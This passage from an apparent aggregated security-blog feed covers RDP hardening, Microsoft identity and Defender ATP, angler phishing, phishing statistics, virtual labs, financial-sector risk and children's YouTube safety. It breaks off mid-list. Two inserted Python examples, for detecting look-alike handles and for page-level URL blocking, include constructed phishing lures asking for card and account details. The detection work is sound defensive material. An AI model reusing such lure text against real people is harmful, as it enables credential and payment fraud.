Accounts within the domain admins group have full control of the domain by default, by virtue of being part of the administrators group for all domain controllers, domain workstations and domain member servers. If a credential for a domain admin account is retrieved from the RDP server, the attacker now holds the ‘keys to the kingdom’ and is in full control of the entire domain. You should reduce the amount of domain administrators within the organization in general and avoid accessing the RDP server or other externally exposed systems via these accounts, to avoid inadvertently making credentials accessible.

In general, ‘least privilege’ administration models should be used. Microsoft provides guidance in this area, including how best to use domain admin accounts, here.

Consider Placement Within the Network

Where possible, RDP servers should be placed within a DMZ or other restricted area of the network. The idea here is that if an attack is successful, its scope is reduced and confined to the RDP server alone. Often RDP is exposed specifically to allow external users onto the network, so this may not be a feasible solution. However, it should be considered, and the quantity of services reachable within the internal network should be minimized.

Consider using an account-naming convention that does not reveal organizational information

There are many options for account naming conventions, ranging from firstname.lastname to not deriving usernames from name data at all, each with its own pros and cons. However, some of the more commonly used account naming conventions, such as firstname.lastname, make it very easy to guess usernames and email addresses. This can be a security concern as spammers and hackers will readily use this information.

Conclusion

When trying to run an efficient IT organization, having remote access to certain computer systems might be essential. Unfortunately, when not implemented correctly, the tools that make remote access possible also open your systems up to unwanted guests. In the last few years there have been far too many examples of where vulnerable RDP access gave way to a full-scale network compromise.

In this article we have shown that RDP access can be hardened with some easy steps. Please take the time to review your RDP security posture.

The post RDP Security Explained appeared first on McAfee Blogs.

5 principles driving a customer-obsessed identity strategy at Microsoft

The cloud era has fundamentally changed the way businesses must think about security. For a long time, we built security around the perimeter. But today, the boundaryless landscape demands that we start with the individual.

In our journey with customers co-designing our products and services, Microsoft has learned that our identity solutions need to do more than just support employee productivity. We have to take things further to ensure our solutions empower our customers to work more closely with their business partners and nurture deeper relationships with their customers, who want help not just securing their personal information, but also protecting their privacy. The problems our customers need to solve, and the scenarios they want enabled for the future, have shaped the design principles guiding our identity strategy.

Embrace open standards

The world of cloud and devices is inherently heterogeneous. Our customers, their partners, and their customers will use many devices, apps, and services from many different vendors. The complexity of managing and securing such a mixed environment could be overwhelming if not for open standards. For example, OAuth 2.0, OIDC, and SAML enable single sign-on across apps and clouds from multiple vendors, SCIM enables automated user provisioning, and the new standards from the FIDO alliance make signing in more secure. This is why every API and protocol Azure AD supports is based on open standards and why Microsoft is actively engaged in all the major identity standards bodies.

Offer industry-leading security

Our goal is to create an identity system that’s secure and private from the ground up. This means blocking every avenue of attack that we can. Enabling MFA reduces credential-based security breaches by more than 99 percent, but there’s still risk from people mishandling their passwords or getting tricked into handing them over. Adopting FIDO with the recently ratified WebAuthn standard makes it possible to eliminate passwords altogether, replacing them with a biometric device or a phone. If you have a Microsoft Account, you can go passwordless today. Soon, passwordless sign-in will be an option on every Microsoft platform and application, as well as for third party applications that integrate with Azure AD.

We now put the full power of the cloud behind every authentication request. Using Azure AD Conditional Access as a starting point, organizations can implement a Zero Trust security strategy that examines not only the identity of the user, but also the type and health of their device, the properties and reputation of the network they’re connecting from, the app they’re using, and the sensitivity of the data they’re trying to access. This not only makes security stronger, it also improves the user experience. For example, we can employ cloud-scale machine learning algorithms, which process trillions of signals daily, to learn each user’s common behavioral patterns and flag authentication attempts that are abnormal or high risk. This way, policies invoke MFA or other additional measures only when necessary, making the experience less interruptive to users.

Make governance easier and more automatic

Implementing strong governance strengthens security guardrails, but most customers find the task daunting. Granting access is easy. Remembering months later to remove access for each person who may have changed roles is not. Identity systems should make it easier to assign the right access to the right people, for example, by automating user access provisioning and deprovisioning based on a user role, location, and business unit. It should be easier for employees and partners to request access when they need it. And most importantly, the system should prompt administrators to review access permissions on a regular cadence or when people change roles. And all of these processes should be driven and informed by world class machine learning and AI which constantly monitor for unusual patterns and unrecognized risks.

Deliver a comprehensive solution, not building blocks

One of the key things we’ve learned from our enterprise customers is that they’re sick and tired of cobbling together identity solutions based on mix and match sets of identity building blocks acquired from a myriad of vendors. They want a holistic solution that supports all their applications and all their different identities while giving them security and control without the gaps that inevitably occur when multiple point solutions are patched together. We’ll do this by delivering a completely integrated identity and access management suite that gives them a single place to go to manage—and protect—all identities, whether they belong to employees, business partners, or customers and all of the resources, they need to access.

Give people control over their information

A holistic solution that accepts identities people bring with them is a necessary prerequisite to the vision of decentralized identity. Microsoft believes everyone has the right to own and control their digital identity—one that securely and privately stores all personal data. To achieve this vision, we need to augment existing cloud identity systems with one that individuals, organizations, and devices can own so they can control their digital identity and data. We believe a standards-based decentralized identity system can unlock a new set of experiences that empowers users and organizations to have greater control over their data—and deliver a higher degree of trust and security.

Taking the next step

Everyone in the identity division at Microsoft is passionately committed to ensuring the systems we build empower people to do their best work and live their best lives.

If one thing is clear, though, these identity initiatives are a journey. Over the coming months, we’ll invite you to participate in a series of technology previews, where your feedback will help shape how identity services will take us closer to a world without passwords, where organizations can easily manage and secure complex environments, and individuals can worry less and stop making trade-offs among ease of use, privacy, and security. Working together as an industry, we’re building a better path to security and privacy, anchored around the one constant in this fast-moving, heterogeneous world—you.

The post 5 principles driving a customer-obsessed identity strategy at Microsoft appeared first on Microsoft Security.

Getting Started with Local Security Groups

For several months we have been profiling experienced security practitioners as well as those still getting started. Our reasoning is simple - there is no one surefire way to gain the experience and knowledge necessary to thrive in the world of cybersecurity. Nearly everyone has a different path - some are PhDs while others barely made it out of high school. Some had deeply technical backgrounds while others stumbled into security out of pure curiosity. Even with the lack of a defined path, we’re hoping that these profiles help individuals figure out the best path for them.

Inside out: Get to know the advanced technologies at the core of Microsoft Defender ATP next generation protection

While Windows Defender Antivirus makes catching 5 billion threats on devices every month look easy, multiple advanced detection and prevention technologies work under the hood to make this happen.

Windows Defender Antivirus is the next-generation protection component of Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP), Microsoft’s unified endpoint security platform. Much like how Microsoft Defender ATP integrates multiple capabilities to address the complex security challenges in modern enterprises, Windows Defender Antivirus uses multiple engines to detect and stop a wide range of threats and attacker techniques at multiple points.

These next-generation protection engines provide industry-best detection and blocking capabilities. Many of these engines are built into the client and provide advanced protection against the majority of threats in real time. When the client encounters unknown threats, it sends metadata or the file itself to the cloud protection service, where more advanced protections examine new threats on the fly and integrate signals from multiple sources.

These next-generation protection engines ensure that protection is:

  • Accurate: Threats both common and sophisticated, a lot of which are designed to try and slip through protections, are detected and blocked
  • Real-time: Threats are prevented from getting on to devices, stopped in real-time at first sight, or detected and remediated in the least possible time (typically within a few milliseconds)
  • Intelligent: Through the power of the cloud, machine learning (ML), and Microsoft’s industry-leading optics, protection is enriched and made even more effective against new and unknown threats

My team continuously enhances each of these engines to be increasingly effective at catching the latest strains of malware and attack methods. These enhancements show up in consistent top scores in industry tests, but more importantly, translate to threats and malware outbreaks stopped and more customers protected.

Here’s a rundown of the many components of the next generation protection capabilities in Microsoft Defender ATP:

In the cloud:

  • Metadata-based ML engine – Specialized ML models, which include file type-specific models, feature-specific models, and adversary-hardened monotonic models, analyze a featurized description of suspicious files sent by the client. Stacked ensemble classifiers combine results from these models to make a real-time verdict to allow or block files pre-execution.
  • Behavior-based ML engine – Suspicious behavior sequences and advanced attack techniques are monitored on the client as triggers to analyze the process tree behavior using real-time cloud ML models. Monitored attack techniques span the attack chain, from exploits, elevation, and persistence all the way through to lateral movement and exfiltration.
  • AMSI-paired ML engine – Pairs of client-side and cloud-side models perform advanced analysis of scripting behavior pre- and post-execution to catch advanced threats like fileless and in-memory attacks. These models include a pair of models for each of the scripting engines covered, including PowerShell, JavaScript, VBScript, and Office VBA macros. Integrations include both dynamic content calls and/or behavior instrumentation on the scripting engines.
  • File classification ML engine – Multi-class, deep neural network classifiers examine full file contents, providing an additional layer of defense against attacks that require additional analysis. Suspicious files are held from running and submitted to the cloud protection service for classification. Within seconds, full-content deep learning models produce a classification and reply to the client to allow or block the file.
  • Detonation-based ML engine – Suspicious files are detonated in a sandbox. Deep learning classifiers analyze the observed behaviors to block attacks.
  • Reputation ML engine – Domain-expert reputation sources and models from across Microsoft are queried to block threats that are linked to malicious or suspicious URLs, domains, emails, and files. Sources include Windows Defender SmartScreen for URL reputation models and Office 365 ATP for email attachment expert knowledge, among other Microsoft services through the Microsoft Intelligent Security Graph.
  • Smart rules engine – Expert-written smart rules identify threats based on researcher expertise and collective knowledge of threats.

On the client:

  • ML engine – A set of light-weight machine learning models make a verdict within milliseconds. These include specialized models and features that are built for specific file types commonly abused by attackers. Examples include models built for portable executable (PE) files, PowerShell, Office macros, JavaScript, PDF files, and more.
  • Behavior monitoring engine – The behavior monitoring engine monitors for potential attacks post-execution. It observes process behaviors, including behavior sequence at runtime, to identify and block certain types of activities based on predetermined rules.
  • Memory scanning engine – This engine scans the memory space used by a running process to expose malicious behavior that may be hiding through code obfuscation.
  • AMSI integration engine – Deep in-app integration engine enables detection of fileless and in-memory attacks through Antimalware Scan Interface (AMSI), defeating code obfuscation. This integration blocks malicious behavior of scripts client-side.
  • Heuristics engine – Heuristic rules identify file characteristics that have similarities with known malicious characteristics to catch new threats or modified versions of known threats.
  • Emulation engine – The emulation engine dynamically unpacks malware and examines how it would behave at runtime. Dynamically emulating the content, then scanning both the behavior observed during emulation and the memory content at the end of emulation, defeats malware packers and exposes the behavior of polymorphic malware.
  • Network engine – Network activities are inspected to identify and stop malicious activities from threats.

Together with attack surface reduction—composed of advanced capabilities like hardware-based isolation, application control, exploit protection, network protection, controlled folder access, attack surface reduction rules, and network firewall—these next-generation protection engines deliver Microsoft Defender ATP’s pre-breach capabilities, stopping attacks before they can infiltrate devices and compromise networks.

As part of Microsoft’s defense-in-depth solution, the superior performance of these engines accrues to the Microsoft Defender ATP unified endpoint protection, where antivirus detections and other next-generation protection capabilities enrich endpoint detection and response, automated investigation and remediation, advanced hunting, threat and vulnerability management, managed threat hunting service, and other capabilities.

These protections are further amplified through Microsoft Threat Protection, Microsoft’s comprehensive, end-to-end security solution for the modern workplace. Through signal-sharing and orchestration of remediation across Microsoft’s security technologies, Microsoft Threat Protection secures identities, endpoints, email and data, apps, and infrastructure.

The enormous evolution of Microsoft Defender ATP’s next generation protection follows the same upward trajectory of innovation across Microsoft’s security technologies, which the industry recognizes, and customers benefit from. We will continue to improve and lead the industry in evolving security.
Tanmay Ganacharya (@tanmayg)
Principal Director, Microsoft Defender ATP Research

Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft Defender ATP community.

Follow us on Twitter @MsftSecIntel.

The post Inside out: Get to know the advanced technologies at the core of Microsoft Defender ATP next generation protection appeared first on Microsoft Security.

What is angler phishing?

Many of us live out our whole lives on Facebook, Twitter, Instagram and LinkedIn, publicising our thoughts, interacting with friends, strangers and businesses, and keeping abreast of current affairs.

But all that activity has made social media a breeding ground for a new form of cyber attack known as angler phishing.

What is angler phishing?

Angler phishing is a specific type of phishing attack that exists on social media. Unlike traditional phishing, which involves emails spoofing legitimate organisations, angler phishing attacks are launched using bogus corporate social media accounts.

This is how it works: cyber criminals are aware that organisations are increasingly using social media to interact with their customers, whether that’s for marketing and promotional purposes or to offer a simple route for customers to ask questions or make complaints.

Here’s an example (image not reproduced in text; alt text: “angler phishing”):

Making complaints on social media puts pressure on organisations to resolve the issue promptly.

Organisations often respond more quickly to issues raised on social media, as it provides an opportunity for good PR.

Most responses are along the same lines as our example: the organisation asks the customer to provide their personal details, so it can verify the issue and respond appropriately.

Unfortunately, cyber criminals have exploited this by spoofing corporate accounts and intercepting customer queries.

They use account handles that mimic legitimate sites – like ‘@dominoscustomercare’, for example – search for customer complaints directed at the legitimate site and respond.

Eagle-eyed individuals might notice that the response came from a different account than the one they messaged, but it’s not uncommon for a big company to direct customer complaints to a dedicated account.

But more often than not, people see that the response comes from an account with the organisation’s name and logo and don’t notice the difference.

The fraudster will then ask the customer to direct message them their account details (as many genuine organisations do) or direct them towards what is supposedly a customer support page but is in fact a malicious site, which steals personal information or infects the customer’s device with malware.
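
To show how a defender might screen the replies a customer receives for the look-alike handles described above, here is an added example in Python; it is not code from the original post or from IT Governance. The brand handles, the organisation’s domains, the reason strings and the sample replies are all constructed for the illustration, and the edit-distance threshold of 2 is an assumption.

```python
"""Screen replies to a customer complaint for angler-phishing look-alike accounts.

Added example, not code from the original post or from IT Governance. The brand
handles, the organisation's domains and the sample replies are all constructed.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass
class Reply:
    handle: str      # account that sent the reply, without the leading '@'
    verified: bool   # the platform's own verification flag for that account
    text: str


# Constructed brand profile: the handles and domains the organisation really uses.
OFFICIAL_HANDLES = {"dominos", "dominos_uk"}
OFFICIAL_DOMAINS = {"dominos.co.uk", "dominos.com"}
BRAND_TOKENS = ("dominos", "domino")

# Reason codes returned by assess(); an empty list means nothing was flagged.
IMITATES_BRAND = "handle imitates the brand but is not an official account"
NOT_VERIFIED = "imitating account is not verified"
ASKS_FOR_DETAILS = "asks for account or payment details by direct message"
OFFSITE_LINK = "links to a domain the organisation does not own"

URL_RE = re.compile(r"https?://[^\s)>\]]+", re.IGNORECASE)
DM_RE = re.compile(
    r"\b(dm|direct message|message)\b.{0,60}?\b(account|card|password|login|details)\b",
    re.IGNORECASE,
)


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch one- or two-character typo-squats of a handle."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def imitates_brand(handle: str) -> bool:
    """True for a non-official handle that contains the brand name or nearly matches an official one."""
    h = handle.lower()
    if h in OFFICIAL_HANDLES:
        return False
    if any(token in h for token in BRAND_TOKENS):
        return True
    return any(levenshtein(h, official) <= 2 for official in OFFICIAL_HANDLES)


def is_official_domain(host) -> bool:
    """Exact or subdomain match only: 'dominos.co.uk.evil.example' does not pass."""
    host = (host or "").lower()
    return any(host == d or host.endswith("." + d) for d in OFFICIAL_DOMAINS)


def offsite_links(text: str) -> list:
    """URLs in the reply whose host is not one of the organisation's own domains."""
    return [u for u in URL_RE.findall(text) if not is_official_domain(urlparse(u).hostname)]


def assess(reply: Reply) -> list:
    """Return the reasons a reply looks like angler phishing; more reasons, higher confidence."""
    reasons = []
    if reply.handle.lower() in OFFICIAL_HANDLES:
        return reasons                      # the organisation's own account
    if imitates_brand(reply.handle):
        reasons.append(IMITATES_BRAND)
        if not reply.verified:
            reasons.append(NOT_VERIFIED)
    if DM_RE.search(reply.text):
        reasons.append(ASKS_FOR_DETAILS)
    if offsite_links(reply.text):
        reasons.append(OFFSITE_LINK)
    return reasons


# Constructed sample thread: four accounts reply to the same customer complaint.
SAMPLE_REPLIES = [
    Reply("dominos_uk", True,
          "Sorry to hear that! DM us your order number and we will look into it."),
    Reply("dominoscustomercare", False,
          "So sorry about your order. Please DM us your account details and card number "
          "so we can refund you: http://dominos-refunds.example.net/claim"),
    Reply("d0minos_uk", False,
          "Refunds are handled at https://dominos.co.uk.support-desk.example/refund"),
    Reply("pizza_fan_42", False, "Same thing happened to me last week!"),
]

if __name__ == "__main__":
    for reply in SAMPLE_REPLIES:
        print(f"@{reply.handle}: {assess(reply) or ['no flags']}")
```

The official account gets no flags even though it asks for an order number, because requests for details from the real account are the normal behaviour the post describes; the checks only accumulate on accounts that are not in the organisation’s own list. A reply that earns only the off-site-link reason is low confidence on its own, so a brand-monitoring team would treat the number of reasons as the severity rather than act on any single one.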

Phishing email protection

Many social media users know very little about angler phishing. That’s bad news for organisations, given how often employees browse social media during their lunch breaks or quiet periods.

After all, it only takes one person clicking a bogus link to infect the organisation’s systems.

That’s why it’s important to teach your staff how to spot scammers’ bait. Our Phishing Staff Awareness Course teaches you everything you need to avoid every type of attack, from social media scams to email- and SMS-based threats.

A version of this blog was originally published on 19 June 2017.

The post What is angler phishing? appeared first on IT Governance Blog.

Are Virtual Cybersecurity Labs the Future of Cybersecurity Education?

Cybercrime affecting businesses has become so widespread that IT and network security professionals are always thinking about that next breach and the costs of recovering from it. This increased risk has also raised the demand for better virtual defenses to prevent the loss of sensitive organizational data such as personal consumer details and internal communications.

There is a substantial need for cybersecurity training. It’s something that many businesses are interested in, but implementing the right system isn’t easy. Physical labs are expensive, require significant time and resources, and aligning everyone’s schedules is often impossible.

Virtual labs are a great way for you to provide your customers and partners with access to the latest cybersecurity product demos and training. These labs are accessible from anywhere, customers can engage with them on their terms, they cost less, and increase the overall quality of the training.

What’s the Appeal of Virtual Cybersecurity Labs?

In the corporate sphere, there has been a trend in recent years of organizations shifting away from traditional instructor-led courses towards virtual cybersecurity training labs. The transition is due to the high demand for meticulous cybersecurity education that offers first-hand experience to participants while keeping costs low.

Cloud-based training environments are appealing because they offer a scenario-based approach. Since the field of cybersecurity requires analytical and critical thinking in real-world circumstances, the controlled environment of a virtual lab is often cited as the best method for teaching network security. Learners will encounter real-world scenarios, work through them, and engage with essential hands-on material that provides more engagement than a traditional slideshow or lecture.

What Are The Primary Benefits of a Virtual Cybersecurity Lab?

  • These classes offer training and simulations that are run through cloud-based virtual machines that are accessible from any of the major browsers. Participants can engage with the material, request help, and engage in team exercises from anywhere in the world.
  • A virtual lab removes the need for travel costs or high-end hardware on the client side since training is conducted primarily through an Internet browser on the employee’s terminal. The simulation is centralized and accessible from anywhere at any time with nothing but an Internet connection.
  • Because the host hardware is centralized, upgrading the lab in response to continually evolving technologies and security trends can be done inexpensively and quickly.
  • A single lab can be expanded to accommodate additional employees or partners at little to no cost. You can add additional RAM, user slots, and other specs as needed. This has helped make virtual labs a popular choice for growing businesses.
  • Feedback between instructors and participants is instant and convenient. Instructors can step in at any point and offer help, track user participation, and other relevant analytics.

What Should You Look for in a Virtual Cybersecurity Environment Provider?

There is no shortage of virtual lab providers on the market. Cloud-based cybersecurity courses are in huge demand because of the added customization that they offer. The process for developing a suitable training lab differs depending on your organization’s needs and preferences. However, here are a few things to consider:

  • Networking devices, including switches, routers, and firewalls. Remember that you want to support multiple instances of virtualization for the networking scenarios used in the course. While you want the reliability of enterprise-grade equipment, consider looking into the refurbished market if your business needs to keep costs low.
  • Find a reputable virtual lab provider. There are many virtual IT labs on the market. Find one that offers the right mix of features, analytics, and the ability to scale as you grow.
  • Have the right IT team in place. Your IT team will need to create the environments for any material that you want to teach within the cloud. Getting started isn’t hard, but it will require an IT professional that knows how to prepare the needed virtual environments.

The goal of this process is to build a successful hands-on virtual cybersecurity lab that is scalable to all participants and teaches essential cybersecurity skills in real-world environments to your customers and business partners.

Are Virtual Cybersecurity Labs Really the Future?

It’s safe to say that cloud technology isn’t going anywhere at this point. We are still feeling the effects of the innovation wave that was caused by the invention of cloud technology.

Everything we do today is tied to the cloud in some way.

  • The most popular software offered by Adobe and Microsoft is all cloud-based.
  • That CRM your business relies on is powered by the cloud.
  • Your favorite Spotify playlist is stored in the cloud.

B2B training is changing. The advancements in virtual labs have accelerated the obsolescence of traditional labs. Agile companies that want to stay competitive will need to accept this and transition their cybersecurity, IT, and product demos to the cloud.

New technologies are frightening to businesses with established processes. But if we’ve learned anything from the failures of Kodak, Nokia, Xerox, Blockbuster, and other large corporations, it’s that failing to stay in line with innovation can (and will) lead to disastrous results in the long-term.

The post Are Virtual Cybersecurity Labs the Future of Cybersecurity Education? appeared first on CyberDB.

How can UK Financial Services Organisations Combat the Cyber Threat?

Guest article by Genevra Champion, Sector Marketing Manager at IT Governance

The financial services industry is naturally a lucrative target for cyber criminals. Financial organisations trade and control vast amounts of money, as well as collecting and storing customers’ personal information, so clearly a data breach could be disastrous for an industry that is built on trust with its customers.

The financial services industry is second only to retail in terms of the industries most affected by cyber crime – the number of breaches reported by UK financial services firms to the FCA increased 480 per cent in 2018, compared to the previous year. While financial services organisations are heavily regulated and cybersecurity is becoming more of a business priority, there is still much more to be accomplished when it comes to businesses understanding what measures must be taken – from the C-suite down – to effectively protect organisations against inevitable breaches.

So how can financial services firms proactively equip themselves to respond to increased regulatory scrutiny and mitigate the impact from the growing number of threats they will face?

Mitigating the Cyber Threat
Financial institutions were able to defend against two-thirds of unauthorised fraud attempts in 2018, but the scale of attacks significantly increased. Significant market players including Tesco Bank, Metro Bank and HSBC all reported breaches in the last year. Clearly, the banks’ cybersecurity defences have not developed at a fast enough pace. Cyber criminals can and will dramatically outspend their targets with increasingly sophisticated attack methods. In addition, many of the traditional banks struggle with large, cumbersome legacy systems, which pose significant reliability issues, as well as flaws in security.

Last year’s IT banking disaster locked thousands of TSB customers out of their accounts, and fraudsters exploited the situation by posing as bank staff on calls to customers in order to steal significant sums of money from them. The breach occurred while the company was conducting an upgrade on its IT systems to migrate customer data to a new platform. This wasn’t just bad luck for TSB, but a failure to adequately plan and assess the risks that come with such a huge project. The bank has since pledged to refund all customers that are victims of fraud, a move which will likely see other banks reviewing their approach to the rise of this particular type of cybercrime.

The industry must understand that security incidents are an ever-present risk. However, organisations can be prepared - scoping a defence strategy specific to the firm, with processes for implementation, will mean an attack can be quickly identified, isolated and resolved, minimising business impact.

Appropriate Defence Strategy
The FCA has set out various cybersecurity insights that show how cybersecurity practices of UK financial services firms are under the regulatory microscope, as the cyber threat continues to grow. The approach from the FCA includes practices for organisations to put into action such as those that promote governance and put cyber risk on the board agenda. The advice also covers areas such as identifying and protecting information assets, being alert to emerging threats and being ready to respond, as well as testing and refining defences. With cybercrime tools and techniques advancing at a rapid pace, and increasing regulations, it’s no wonder that many organisations struggle to keep up to ensure their defences stay ahead of the game.

In order for in-house security teams to keep up to date with current and evolving threats and data protection issues, firms must invest in regular training. Specialist skills are required to mitigate cyber risk, which for some could be cost-prohibitive. As an alternative, an insourced model allows you to leverage a dedicated and skilled team on an ‘as you need’ basis to deliver an appropriate strategy. With a Cyber Security as a Service (CSaaS) model in place, organisations can rapidly access a dedicated team with the knowledge and skills to deliver a relevant and risk appropriate cyber security strategy.

Crucially, in addition to completing a gap analysis and a multi-layered defence strategy, the model will also apply to people and processes. Attackers will generally aim at the weakest point of an organisation – often it’s staff. Human nature means passwords are forgotten, malware isn’t noticed, or phishing emails are opened, for example. Therefore, a blended approach of technology, processes and shared behaviour is required that promotes the need for staff awareness and education of the risks, in order to effectively combat the threat.

Conclusion
With increased regulatory attention across security and privacy, firms must take steps to improve their defences, or risk severe financial and reputational damage. The issue of cybersecurity risk must become as embedded within business thinking as operational risk. Anyone within an organisation can be a weak link, so the importance of cybersecurity defences must be promoted at all levels – from the board all the way through to the admin departments. It’s everyone’s responsibility to keep the organisation protected against threats.

While the threat of cyber attack is real, financial services firms do not have to take on the battle alone. With a CSaaS model in place, organisations can start to take back control of their cybersecurity strategy and embed it as a trusted, cost-effective and workable core part of the business’s processes.

4 eye-opening facts about phishing

You probably know what phishing is. It’s been around almost as long as the Internet, and everyone from your employer to Facebook provides warnings about how to identify and report such scams.

But are you aware of how extensive phishing is? The cyber security company Webroot has identified four facts about how phishing works that might make you see the threat in a new light.

1. Phishing sites have a lifecycle of about 15 hours.

In order to reduce the chances of being detected and blocked, scammers are constantly creating new phishing sites and deactivating old ones.

On average, phishing sites are live for only 15 hours. By the time someone’s raised the alarm about a malicious site and the organisation has updated its security measures and warned employees not to click the link, the fraudster is already well on their way to their next scam.

2. Most malicious links are hidden within benign domains.

Scammers rarely use dedicated domain names for phishing attacks these days, because they can be easily identified and blacklisted.

Instead, malicious emails will almost always contain domains “associated with benign activity” to increase the probability of their success. Criminal hackers prefer to compromise a single page of a benign site and replace its content with a phishing page, which is more difficult to detect.
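
Facts 1 and 2 together change what a URL block list has to look like: keying it on the registered domain would block an entire benign site for one compromised page, and a listing that is several days old may already be dead or moved. The following Python is an added example, not code from the original post or from Webroot; the entries, the fixed clock value and the URLs checked are constructed, and the 15-hour window is taken from the post’s average lifetime.

```python
"""Block-list lookup that can block one phishing page on an otherwise benign site.

Added example, not code from the original post or from Webroot. The list entries,
the clock value and the URLs checked below are constructed.
"""
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote, urlsplit

# Roughly the lifetime of a phishing page given in the post; older listings are
# not silently dropped, they are sent for re-verification instead.
MAX_AGE = timedelta(hours=15)


def canonical(url: str):
    """Reduce a URL to (host, path), dropping the parts a scammer varies freely."""
    parts = urlsplit(url.strip())
    host = (parts.hostname or "").lower().rstrip(".")
    if host.startswith("www."):
        host = host[4:]
    path = re.sub(r"/+", "/", unquote(parts.path)) or "/"
    if len(path) > 1 and path.endswith("/"):
        path = path[:-1]
    return host, path          # query string and fragment are deliberately ignored


class PhishingBlocklist:
    """Entries keyed on (host, path). A path of '/' blocks the whole host (a dedicated
    phishing domain); any other path blocks only that page and the pages below it,
    so the rest of a compromised benign site stays reachable."""

    def __init__(self):
        self._entries = {}     # (host, path) -> datetime the page was last confirmed live

    def add(self, url: str, seen_at: datetime) -> None:
        key = canonical(url)
        previous = self._entries.get(key)
        if previous is None or seen_at > previous:
            self._entries[key] = seen_at

    def verdict(self, url: str, now: datetime) -> str:
        """'block' for a fresh matching entry, 'review' for a stale one, else 'allow'."""
        host, path = canonical(url)
        for (h, p), seen in self._entries.items():
            if h != host:
                continue
            if p == "/" or path == p or path.startswith(p + "/"):
                return "block" if now - seen <= MAX_AGE else "review"
        return "allow"


# Constructed clock and sample listings.
NOW = datetime(2019, 6, 28, 12, 0, tzinfo=timezone.utc)


def sample_blocklist() -> PhishingBlocklist:
    bl = PhishingBlocklist()
    # A phishing kit dropped into one directory of a legitimate charity site.
    bl.add("https://example-charity.org/wp-content/uploads/secure/login.php", NOW - timedelta(hours=2))
    # A dedicated phishing host: block everything on it.
    bl.add("http://login-verify.example/", NOW - timedelta(hours=1))
    # A listing last confirmed three days ago, well past the typical lifetime.
    bl.add("https://old-host.example/confirm/", NOW - timedelta(days=3))
    return bl


if __name__ == "__main__":
    bl = sample_blocklist()
    for candidate in (
        "https://www.example-charity.org/wp-content/uploads/secure/login.php?acct=1",
        "https://example-charity.org/about",
        "http://login-verify.example/any/path",
        "https://old-host.example/confirm",
    ):
        print(bl.verdict(candidate, NOW), candidate)
```

The charity’s other pages stay reachable while its one compromised page is blocked, and the stale entry produces a “review” verdict rather than an allow, since a page that is past the typical lifetime may have been cleaned up or simply moved elsewhere on the same site.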

3. About 400,000 phishing sites are created each month

To keep up with the phishing sites’ brief lifecycle, scammers are forced to create hundreds of thousands of phishing sites each month.

The websites might be used for a single phishing campaign or used for a variety of attacks. Either way, it’s easy to see why it’s so difficult for spam filters to keep track of malicious sites. There are simply so many that a few will inevitably fall through the system and end up in users’ inboxes.

4. Google, PayPal and Apple are the most commonly spoofed organisations

Scammers have always targeted well-respected organisations, but things are so much easier for them now that there are dozens of organisations that collect the majority of people’s personal data.

Google is the most frequently spoofed organisation, but PayPal, Amazon and Facebook are also hugely popular subjects for phishing scams.

Want to know how to prevent phishing attacks?

If you want to avoid falling for phishing scams, you have to trust your own judgement. Technological solutions like spam filters can’t catch everything, and they won’t help in the event of specific forms of phishing, like BEC (business email compromise) scams.

Fortunately, no matter how severe the threat is, there are always clues that can help you identify phishing scams.

You can teach your employees how to become experts at spotting those clues with the help of our Phishing Staff Awareness Course. Packed with real-life examples and best practices for staying safe, this online course helps employees become an active part of your organisation’s cyber security strategy.

A version of this blog was originally published on 14 December 2016.

The post 4 eye-opening facts about phishing appeared first on IT Governance Blog.

Kids Obsessed with YouTube? How to Help Them Stay Balanced, Safe This Summer

If you haven’t seen your kids in a few hours but can hear outbursts of laughter from a nearby room, chances are, they — along with millions of other kids — are watching YouTube. The popular digital video hub has more viewers than network television and soaks up more than 46,000 years of our collective viewing time annually. Chances are your kids will be part of the YouTube digital mosh pit this summer, but do you know the risks?

Types of screen time

The quality of online time for kids usually shifts during the summer months. For example, there’s active screen time and passive screen time. Knowing the difference between the two can help your family decide best how to balance device use — especially when it comes to consuming endless hours on YouTube.

Active screen time requires a person’s cognitive and/or physical engagement and develops social, language, or physical skills. Engaging in activities such as researching, creating original content, learning a new program, and playing educational games is considered active screen usage. Active screen time tends to go up during the school year and down in the summer.

Passive screen time is passively absorbing information via a screen, app, or game for entertainment reasons only. This includes scrolling through social networks, watching movies (binge watching), and watching YouTube videos. Little to no thought or creativity is required when a person engages in repetitious, passive screen activities.

According to a Common Sense Media study, children ages 8 to 12 spend nearly six hours per day using media, and teenagers average closer to nine hours a day (numbers don’t include school work). It’s safe to say that during the summer, these numbers climb even higher — as do the risks.

Here are a few ways to balance screen time and boost safety on YouTube this summer.

YouTube: 5 Family Talking Points

  • Explore YouTube. The best way to understand the culture of YouTube is to spend time there. Ask your kids about their favorite channels and what they like about them. Get to know the people they follow — after all, these are the people influencing your child. Here’s a sampling of a few top YouTubers: MattyBRaps (music), JoJoSiwa (music, dance), Brooklyn and Bailey (vlogs, challenges, music), Baby Ariel (challenges, vlog), Johnny Orlando (music), PewDiePie (comedy), Jacy and Kacy (crafts, challenges), Bethany Mota (shopping hauls), Grav3yardgirl (makeup), Smosh (comedy).
  • Respect age limits. YouTube is packed with humor, tutorials, pranks, vlogs, music, reviews, and endlessly engaging content. However, age limits exist for a good reason because the channel also has its share of dangerous content. The darker side of YouTube is always just a click away and includes sexual content, hate content, harassment and cyberbullying, violent and graphic content, and scams.
  • Turn on restricted mode. By turning on the restricted mode you can block videos with mature content from a user’s searches, related videos, playlists, and shows — this is a big deal since many “up next” videos (on the right side of the screen) are cued to play automatically and can lead kids to sketchy content. In addition to the restricted mode, consider an extra layer of protection with filtering software for all your family devices.
  • Opt for YouTube Kids. For kids under 13, YouTube Kids is a safe video platform, specially curated for young viewers. Kids may snub any platform designed “for kids,” however, if you are worried about younger kids running into inappropriate content, this is your best video option.
  • Discuss the ‘why’ behind the rules. As a parent, you know the possible ways YouTube — or other social platforms — can be harmful. Don’t assume your kids do. Kids are immersed in their peer groups online, which means danger and harm aren’t primary concerns. Even so, before you lecture kids about the dangers of YouTube, open up a dialogue around the topic by asking great questions. Here are just a few to get you started:

